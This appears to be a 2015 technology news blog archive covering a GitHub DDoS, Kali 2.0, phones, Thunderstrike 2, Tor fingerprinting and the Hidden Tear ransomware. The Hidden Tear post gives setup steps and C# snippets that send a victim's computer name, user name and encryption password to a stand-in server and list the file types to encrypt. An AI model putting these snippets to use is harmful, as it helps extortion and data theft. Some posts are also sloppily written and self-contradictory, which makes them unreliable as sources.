Wednesday, August 26, 2015

GitHub Again Attackd By DDoS Attack

GitHub is a popular source code sharing website which is used by programmers for software development and user collaborate in the development. On Tuesday morning GitHub again became the victim of DDoS (Distributed Denial of Service) attack.



After investigation of the attack occur on the website, the team identified that the service of the website was under the new DDoS attack and early on Tuesday company knows the attack.


GitHub posted about this information on there official Twitter account. "The connectivity problems have been identified as a DDoS attack. We're working to mitigate now," on GitHub status.

This time attack did not take last long, roughly just four hours after issue is reported by company. Github announced that everything was back to normal after mitigated the attack.

Last time on march DDoS attack against GitHub lasted about a week. The attackers used the malicious javascript to hijack the internet traffic from victims worldwide that was redirected to GitHub.

Unless from GitHub status page on twitter, the company has not provided much more details about this latest attack.

Sunday, August 23, 2015

Google Just Launches The New OnHub Router New Way To Wi-Fi

Google has launches the new way to wi-fi router called OnHub. It streaming and sharing in new ways our old routers were never built to handle. Meet OnHub, a new router from Google that’s built for all the ways you Wi-Fi.


OnHub gives you many of the features as
  • Speedy streaming for everyone
  • Bandwidth when you need it
  • Wi-Fi with reach
  • Simple setup
  • Helpful feedback
OnHub makes the most of your existing Internet service by using smart software to find the best Wi-Fi connection. Prioritize a device so it has the fastest Wi-Fi for the activities that matter most. OnHub’s innovative circular antenna design provides reliable Wi-Fi coverage in more directions in your home.

Google also provided you the Google On app for managing your OnHub router from your smartphone. It has features like :
  • Run a network check
Easily test the speed of your connection for hiccups, and the app gives you simple ways to get back to peak performance.
  • Keep an eye on your network
See each device that’s connected to your Wi-Fi and which are taking up the most bandwidth.
  • Control from anywhere
Use the Google On app to troubleshoot at home or away, see who’s on your network, or enable a friend to help you remotely.

OnHub is designed to support a growing number of "smart devices" over time because it includes Bluetooth® Smart Ready, 802.15.4 and Weave and 802.15.4, so that over time it will support a growing number of “smart devices.”

It gives you Wi-Fi at a speed of up to 1900 Mbps by supporting both 2.4GHz and 5GHz frequencies, which means fast Wi-Fi for everyone and also gave you fast Wi-Fi, OnHub’s 13 antennas (six 2.4GHz antennas, six 5GHz antennas, and a congestion-sensing antenna) are arranged in a unique circular pattern. It has 4 GB of storage space for auto updates and latest software features.

OnHub router is available for Pre-order and it costs of $199.99. You can pre-order your OnHub router from this Link

Wednesday, August 19, 2015

Google Hangouts Got Dedicated Website

Yes, it is official now. Google launches a dedicated website for google Hangouts. If you use google hangouts for chat or for talking to your friends, you don't need to open google+ or gmail to access google hangouts. 



Just open the dedicated website of Google hangouts https://hangouts.google.com/ for hangouts messaging service.

As you can see in the screen-shot above, the web client contains a contact list on the left, and large buttons to make a video or a phone call as well as to send a message towards the center. The background wallpaper is randomly selected, and changes each time you visit the web page.
source

The Ransomeware Kit Allow Script Kiddies Creating Their Own Ransomware

Utku Sen, a turkish security researcher has posted fully functional ransomware code on code sharing website Github. The ransomware named as Hidden Tear uses the AES encryption for locking the files before displaying the ransom message to get user to pay up.




Utku Sen describes his Ransomware as "a ransomware-like file crypter sample which can be modified for specific purposes." This means even script kiddies can now develop their own Ransomware to threaten people.

The Hidden Tear — Free Ransomware Kit

The "Hidden Tear" Ransomware package consists of four files namely:
  1. Hidden-Tear-Decrypter
  2. Hidden-Tear
  3. .gitignore
  4. README.md
Hidden Tear Ransomware is capable of:
  • Small file size (12 KB)
  • Using AES algorithm to encrypt files
  • Evading detection by all standard anti-virus programs
  • Sending encryption key to a server
  • Creating a text file in Desktop with given message
  • Encrypting files and decrypting them using a decrypter program with the encryption key
How to Setup your Custom Ransomware Using Hidden Tear?

Sen has specified usage details as well, he says:

1. You need to have a web server that supports scripting languages such as PHP or Python. Then change the below-mentioned line with your URL. (Better use HTTPS connection in order to avoid eavesdropping):


string targetURL = "https://www.example.com/hidden-tear/write.php?info=";

2. The script should write the GET parameter to a text file. Sending process running in SendPassword() function:


string info = computerName + "-" + userName + " " + password;
var fullUrl = targetURL + info;
var conent = new System.Net.WebClient().DownloadString(fullUrl);


3. Target file extensions can also be change. Default list:


var validExtensions = new[]{".txt", ".doc", ".docx", ".xls", ".xlsx", ".ppt", ".pptx", ".odt", ".jpg", ".png", ".csv", ".sql", ".mdb", ".sln", ".php", ".asp", ".aspx", ".html", ".xml", ".psd"};

According to Sen,

"While this may be helpful for some, there are significant risks. The 'Hidden Tear' may be used only for 'Educational Purposes.' Do not use it as a Ransomware! You could go to jail on obstruction of justice charges just for running hidden tear, even though you are innocent."

Follow some important steps that should be considered to protect yourself from Ransomware threats.
  • Always keep regular backups of your important data.
  • Make sure you run an active anti-virus security suite of tools on your system.
  • Do not open email attachments from unknown sources.
  • Most importantly, always browse the Internet safely. source

Sunday, August 16, 2015

Personal Cloud Storage

You all heared about the Cloud Storage to store your data or files into the online clouds. In this case you have to register an account to a particular cloud storage website and get some sort of free space to store the data.

But in Personal Cloud storage you don't need to register on another website for cloud storage space, instead you shall have your own storage located at you own house that you can access anywhere, anytime. And also your data is secured at your home and nobody from the outside can access your data.

Other Cloud websites offer you a limited free space but In Personal Cloud Storage you can have your own massive storage

Many of the companies had been launched the Personal Cloud Storage Devices that you can buy at very affordable prices.

Thursday, August 13, 2015

Next Generation Penetration Testing Platform - Kali 2.0 Released

Offensive Security, the creators of Swiss army knife for Security researchers, Penetration testers and Hackers have finally released the much awaited and most powerful version of Kali Linux 2.0. Kali Linux 2.0 (Codename ‘Kali Sana’), an open-source penetration testing platform brings hundreds of Penetration Testing, Forensics, Hacking and Reverse Engineering tools together into a Debian-based Linux distribution.



Features of Kali Linux 2.0 :
  • Runs on Linux kernel 4.0, 
  • use full Gnome 3 Desktop instead of gnome-fallback, 
  • Kali 2.0 added inbuilt screencasting tool so that you can record desktop.
  • Kali Linux now added desktop notifications, so that you do not miss anything, 
  • improved hardware and wireless driver coverage, 
  • Featuring new cutting-edge wireless penetration tools, 
  • support for a variety of Desktop Environments, 
  • updated desktop environment and tools, 
  • Support Ruby 2.0, which will make Metasploit will load much faster, 

Kali 2.0 now natively supports KDE, GNOME3, Xfce, MATE, e17, lxde and i3wm. Kali has removed metaslpoit community and pro packages but instead open source metasploit framework packages are pre-installed available.

Upgrade to Kali 2.0
Kali Linux users can upgrade their Kali 1.x to Kali 2.0 without reinstalling whole operating system from scratch. To do this, you will need to edit your source.list entries, and run a dist-upgrade as shown below.


cat << EOF > /etc/apt/sources.list
deb http://http.kali.org/kali sana main non-free contrib
deb http://security.kali.org/kali-security/ sana/updates main contrib non-free
EOF
apt-get update
apt-get dist-upgrade # get a coffee, or 10.

rebootOfficial Kali Linux Downloads here
Kali Linux Downloads VMware, VirtualBox and ARM Images here

Monday, August 10, 2015

Why Linux is Important for Hackers

Linux Is Open Source

Linux is open source and free available as compared to windows operating system which is available paid. It means that the source code of the operating system is open source and is available for us. As such, we can change and manipulate it as we please. If you are trying to make a system operate in ways it was not intended, being able to manipulate the source code is essential.

Just think of it, linux provides you the full source of the kernel and could microsoft provides you the kernel source of windows for users to modify and use windows for hacking.



Linux Is Transparent

To hack effectively, you must know and understand your operating system and to a large extent, the operating system you are attacking. An operating system can also call to another operating system. Linux is totally transparent, meaning we can see and manipulate all its working parts.

Not so with Windows. User does not know the internal working of the windows operating system because Microsoft tries hard to make it as difficult or impossible to know the inner workings of their operating systems. As a result, when working with Windows you are working with “shadows” of what you think is going on under the hood, user cannot modify or alter the system files of the windows operating system, whereas in Linux you have a “spotlight” shining directly at each and every component of the operating system. This makes working with Linux more efficient and effective.

Linux Offers Granular Control

Linux is granular. That means that we have almost infinite amount of control over the system. In Windows, you only can control what Microsoft allows you to control. In Linux, everything can be controlled by the terminal in the most miniscule to the most macro level. In addition, Linux makes scripting in any of the scripting languages simple and effective.

Most Hacking Tools Are Written for Linux

Well over 90% of all hacking tools are written for Linux. Of course, there are exceptions like Cain and Abel and Havij, but those exceptions simply emphasize the rule. Even when hacking tools such as Metasploit or nmap are ported for Windows, not all the capabilities transfer from Linux. There are only few tools available for windows with less features that why user have to use linux for using these tools.

The Future Belongs to Linux/UNIX

From the beginning of the Internet, Linux/UNIX has been the operating system of choice for web servers for its stability, reliability and robustness. Even today, Linux/UNIX dominates the world of web servers with well over two-thirds of the market. Embedded systems in routers, switches and other devices are almost always using a Linux kernel and the world of virtualization is dominated by Linux with both VMWare and Citrix built on the Linux kernel.

If you believe that the future of computing lies in mobile devices such as tablets and phones (it would hard to argue otherwise), then over 80% of mobile devices are running UNIX or Linux (iOS is UNIX and Android is Linux). Microsoft Windows on mobile devices have just 7% of this market. Is that the wagon you want to be hitched to?

Hacking isn’t for the uninitiated. Hacking is an elite profession among the IT field. As such, it requires extensive and detailed understanding of IT concepts and technologies. At the most fundamental level, Linux is a requirement. 

Sunday, August 9, 2015

Researchers Shares Details of Cyber-Terrorists Targetting Indian Government Officials

Cyber-Terrorism has provoked considerable alarm posed for potential threat which ranges from very narrow to very broad. Terrorists aims at gaining access to Nation's critical infrastructure involving both Government as well as Private sectors involved in cyber espionage and operations.


Nowadays, intensity of cyber attacks are rapidly increasing and extending into absolute cyber-war between states, which allowing terrorists organizations to pilfer data from financial and military organizations. Few months back, a similar incidents happened when a group of middle-east terrorists tried to infiltrate Indian Government official operational in cyber related divisions.

Which in response Independent Indian security researchers team planned a counter operation to track down the terrorist organization behind the cyber attack.

Shesh Sarangdhar, a security researcher at Seclabs & Systems Pvt. told The Hacker News that his team successfully penetrated the source computer (using zero-day exploits) used for spreading malware to Government officials and found that the attacker’s IP address belongs to Pakistan Telecommunication company limited.

“Upon Analysis, the infected system appeared be a part of an elaborately designed cyber operation center,” Mr. Sarangdhar explained.

Researchers found a directory called “Umer Media” on that compromised system, which contained Excel files maintaining a list of “multiple social media profiles of terrorism bent.”

“Excel file elaborately maintained the details of individuals who comment and like on these pages. Many of these social media profiles were later analyzed and revealed some key players behind the cyber-terror organization,” he told The Hacker News team.

The goal of cyber counter operation conducted by the Indian researchers was to prevent cyber attacks against any and all critical infrastructures.

Moreover, the researchers obtained mobile numbers of those key players and compromised their devices using a zero-day vulnerability in Maxthon browser.

“The mobile communication revealed that around 1000 mujahids were being trained to infiltrate Indian borders,” Mr. Sarangdhar told us.
Shesh Sarangdhar and his team will present the complete technical details of their operation, zero-day vulnerabilities used and the malware analysis at upcoming “1337Con” CyberSecurity Conference.

Friday, August 7, 2015

History of Windows From Windows 1.0 to Windows 10 in Single GIF

Microsoft had released its latest windows 10 and many of the user already had it and installed on their system and using it. Here, in a single GIF image file it showing the whole story from the 1985 to 2015 as Windows 1.0 released in 1985 and now Windows 10 released in 2015.

This image is created the onthehub as they show the whole story in a single GIF.


What windows looks like in 1985 and what it looks like now. It has many changes untill now and many new and great features are added.

You can have full experience on onthehub

Thursday, August 6, 2015

The common wisdom when it comes to PCs and Apple computers is that the latter are much more secure. Particularly when it comes to firmware, people have assumed that Apple systems are locked down in ways that PCs aren’t.


Usually Apple's Mac computer are most secure till new vulnerability introduced to hack the apple's mac computer's. The security reseacher has proved that Mac system can also be hacked.

Two security researchers have developed a proof-of-concept computer worm for the first time that can spread automatically between MacBooks, without any need for them to be networked. Thunderstrike 2, the new proof-of-concept firmware attack is inspired by previously developed proof-of-concept firmware called Thunderstrike.

Trammell Hudson a security engineer and Xeno Kovah of firmware security consultancy Legbacore developed Thunderstrike Attack, which actullay took advantage of a vulnerability in Thunderbolt option ROM that could be used to infect Extensible Firmware Interface (EFI) by allocating a malicious code int o the boot ROM of an Apple computer through infected Thunderbolt devices.

Thunderstrike 2 can be spread remotely, an attacker requires to have physical access to your Mac computer to put thunderstrike into your system. Thunderstrike reached to you via phishing emails, malicious web sites as well as through a peripheral connected to the Ethernet port or USB.

The researchers demonstrated the video given below:


"Thunderstrike 2 is really hard to detect, it’s really hard to get rid of, and it’s really hard to protect against something that’s running inside the firmware," Kovah toldWired.

"For most users that’s really a throw-your-machine-away kind of situation. Most people and organizations don’t have the wherewithal to physically open up their machine and electrically reprogram the chip."

Oppo Rolling Out New Update of Color OS 2.1.3i Update

Oppo is rolling out new update of color OS 2.1.3i update for devices Find 7 and Find 7a. Oppo updated the video which showing the new feature of the Color OS.

New Update includes the features of Air Gestures, Eye Protection Mode and efficient power saving mode for their devices. Air gestures allow users to easily navigate on the phone and viewing photos or switching between applications and homescreens.


Power saving mode promises ample energy saving setting and changes that have been made can be saved. So, you can switch the settings on the devices as you want to. When you switch, it automatically loads the predefined settings.

Eye protection mode is for those users or people who continuously uses phone at regular basis and for those who send or read the text on their phone. When this eyed protection is enabled, the screen simply switched to a wam color temperature and back to cold when disables. This is happens as the display's blue lights are set to low, medium or high at levels.

The update also includes the other stabilities or improvement of the performance of the devices and this update will rolling out soon.


Wednesday, August 5, 2015

One-Fifth of The Active Android Device Now Runs the Android Lollipop

As per the latest analysis of this month on android running devices 18.1% of the devices now runs the Android Lollipop. Android Lollipop is the latest version of the Android operating system. And Kitkat has 39.3% running on the android devices. This report is as per the analysis of this month.



Marginally up from the 39.2% figure that was reported in month of June. Jelly Bean's share, on the other hand, has fallen significantly, with 33.6% Android devices currently running it, down from 37.4% reported the last time.

Other Android versions, including Ice Cream Sandwich, Gingerbread, and Froyo are currently powering 4.1%, 4.6%, and 0.3% of all active Android devices, respectively.

Tuesday, August 4, 2015

Motorola Moto G 3rd Generation - Brief

Few phones have managed to leave such a lasting impression in the mobile world in recent years, as the original Moto G. The budget smartphone redefined what can be achieved in a budget-friendly Android phone and sparked a whole new wave of devices, offering advanced functionality in and affordable package.


Features

Water Resistant

You need your phone to be there for you, even in less-than-ideal conditions. IPX7- rated water protection keeps your phone safe from splashes and drop in water. After an accidental splash into a puddle or sink, just dry off you phone and keep going.

Corning Gorilla Glass Display

Motorola Moto G 3rd Generation has Corning Gorilla Glass 3 protection glass spans from nearly edge to edge to help keep your phone protected from unsightly scrapes and scratches.

Long Lasting Battery

This New Moto G comes with 2470 mAh battery with which you can spend whole day without charging your phone and gives you a better battery backup which is designed to last a full day.

Customisation

You can customise you Moto G's Back cover panel and you will get variety of shell with variety of colors so you can customise the color as per you mood.

Pure Android Experience

Motorola Moto G 3rd Generation runs latest Android Lollipop which is free from any bloatware (free from any unnecessary software which slows down the phone). 

Moto Assist

Moto Assist understands where you are and what you are doing and adapts in ways that help you. Like letting only highest-priority calls through while you are asleep, or keeping your phone silent during meetings.

Performance

Motorola Moto G 3rd Generation powered by Qualcomm Snapdragon 410 processor has 1.4 Ghz quadcore CPU and has advances Adreno graphics which provides you to runs multiple apps to run at one time.

It has 5'' inches HD display which provied you vivid colors experience, deep blacks and crisp whites even in outdoors.

Moto G 3rd Gen gives you fast speed of 4G LTE with which you can browse web, stream videos and music, play games and etc.

Moto G 3rd Gen has 13 MP rear camera ans 5 MP front camera. Even in Low light, the ultra-fast f2.0 lens produces crystal clear images and color balancing with dual LED flash preserves color and clarity.

You have two options if you want to buy Moto G 3rd Generation
1. 8GB version has 1 GB of RAM and has cost Rs.11999/- 
2. 16GB version has 2 GB of RAM which costs you Rs.12999/-

and it is available online to purchase.
source

Monday, August 3, 2015

New Flagship Killer OnePlus Two - Brief and Features

OnePlus Two is another Android Powered Smartphone from OnePlus. They made many changes to their new smartphone with the latest new specification and hardware changes in it.

Specification of OnePlus Two 

OnePlus Two Android Smartphone powered by Qualcomm Snapdragon 810  octa-core processor and has 4G LTE and comes with 3300 mAh battery. It has a big power backup for your apps, games and HD video for a long day battery. 

A lot of time is spent looking at our smartphone’s screen, so it should be amazing. The OnePlus 2’s 5.5” IPS LCD display produces incredibly sharp lines and true-to-life colors. Experience crystal clear images, video, and text in any setting.

Never be tied down. The OnePlus 2 comes carrier-unlocked with wide range band support for service providers worldwide. And, with dual SIM capabilities, you can connect to two networks simultaneously to travel with ease. Manage your work life and personal life without the need to carry around two phones. It’s one device, for everything.

It is also comes in multiple back panel for your personal style and you can change style swap covers which comes in premium materials and you can choose it from different variety.


Camera sensor’s large pixels collect more light for less noise and exceptional performance in dark conditions. Advanced laser autofocus and optical image stabilization systems ensure that you never miss that perfect shot, while 6 lens elements prevent distortion and improve clarity. It has 13 MP pixel rear camera and 5MP front camera.

Despite being a go-to measure for smartphone cameras, megapixels fail to tell the whole story. The true test of a camera is the quality of its image sensor and optics. Our sensor contains large 1.3µm light-collecting pixels—the biggest ever in a 13MP smartphone camera—for unmatched low-light performance. A six-element lens prevents distortion, making sure that photos are clear and crisp. Day or night, make every shot beautiful.

This time onePlus comes with OxygenOS in place of Cynnogenmod and it is light and powerful software built on android and has many optimizations and thoughtful features.

A lightweight, resilient aluminum and magnesium alloy frame and stainless steel accents unify the OnePlus 2’s sleek metal design. Durability and sophistication with an unrivaled premium feel.
It has Type - C USB port for both data transfer and changing. It is latest type data cable which is reversible or fumble free. You do need to worry about how or which side you insert in the port. You can insert data cable either from both sides.

It comes with dual sim support. It comes in two variant as 16 GB version comes with 3GB of RAM and 64 GB version comes with 4GB of RAM and it does not has memory card expansion slot. It has 5.5 inches LTPS LCD capacitive touchscreen with 401 ppi pixel density.


It also has fingerprint scanner on its home button. 




Sunday, August 2, 2015

Google's Translate App - Brief

Google Translate app let you translate the text or images into the different languages and it instantly translate visually printed text in seven languages by just opening the app and click on the camera and point it on the printed text and it instantly translate the text - a street sign, ingredient list, instruction manual and etc and this app not require the internet connection or your cell phone data.

Now Google updated the Google Translate app again with adding more language for visually printed translations to 20 more language and now it total becomes 27 language.


Description of Google Translate App

Speak, scan, type or draw to translate in 90 languages.
——
* Type to translate 90 languages
* Use your camera to translate text instantly in 26 languages
* Two-way automatic speech translation in 40 languages
* Draw with your finger as a keyboard alternative
* Download language packs for when you're traveling, or if your connection is expensive or slow.
* Star and save translations for future reference
* Take pictures of text for higher-quality translations or for languages not supported by instant camera translation

New Features added to Google Translate App

Smoother conversation in 40 languages. Improved accessibility support.
Instantly translate printed text in 20 new languages with your camera:
TO/FROM English:
Bulgarian, Catalan, Croatian, Czech, Danish, Dutch, Filipino, Finnish, Hungarian, Indonesian, Lithuanian, Norwegian, Polish, Romanian, Slovak, Swedish, Turkish, Ukrainian
FROM English to:
Hindi, Thai

The Update rolled out for both Android and iOS platforms.

Translate Community working great to make this Google Translate App better. 

Without Cracking Any Encryption Spies Can Unmask Tor Users

Tor (The Onion Tor) Network is using for the anonymous surfing over the internet. Now, the Tor Browser is in danger because the "Spies" who's only intention is to gather information by intruding the other's network.


A team of security researchers from Massachusetts Institute of Technology (MIT) have developed digital attacks that can be used to unmask Tor hidden services in the Deep Web with a high degree of accuracy.

The journalists, hackers ans internet users all are using the TOR network to surf on the internet anonymously. Tor provide anonymity to its user and tracking of the activity done by the user is almost very difficult.

User's who are connected to TOR network gets the encrypted network from where their ISP cannot find the logs or activity of that user and IP of the TOR user are also changed once they are connected to the TOR Network.

Without Decrypting the TOR Network or Traffic the Identities can be Revealed.

The Net Securoty team from MIT and Qatar computing research institute claimed that their is a new vulnerability in the TOR's Guard Gateway that can be exploited to detect whether a user is accessing one of the TOR's hidden services.

They explained, Tor's Guard Gateways could be masqueraded and the packets coming from the user could be made to travel through attacker’s malicious ‘setup’ node acting as an Entry node. In a proof-of-concept attack published this week, the researchers described this technique as "Circuit Fingerprinting,"

It is kind of the behavior biometric which include series of passive attacks that allows spies to unmask the TOR users with almost 80-90 percent accuracy even when without decrypting the tor traffic.

This new alternative approach not only tracks the digital footprints of Tor users but also reveals exactly which hidden service the user was accessing; just by analyzing the traffic data and the pattern of the data packets.

"Tor exhibits fingerprintable traffic patterns that allow an [enemy] to efficiently and accurately identify and correlate circuits involved in the communication with hidden services," says the team.

"Therefore, instead of monitoring every circuit, which may be costly, the first step in the attacker's strategy is to identify suspicious circuits with high confidence to reduce the problem space to just hidden services."

The technique nowhere breaks down the layered encrypted route of Tor network, so being encrypted doesn't make your identity anonymous from others.

The Tor project leader Roger Dingledine raises a question to the researchers asking about genuineness of the accuracy that the Traffic fingerprinting technique delivers, which leaving the researchers and the users confused.

As for the Tor, it is considered to be a popular browser that protects your Anonymity while accessing the Internet. However, with the time and successful breaches, it seems that this phenomenon of the Tor network could get depleted.

According to the MIT News article, the fix was suggested to Tor project representatives, who may add it to a future version of Tor.
source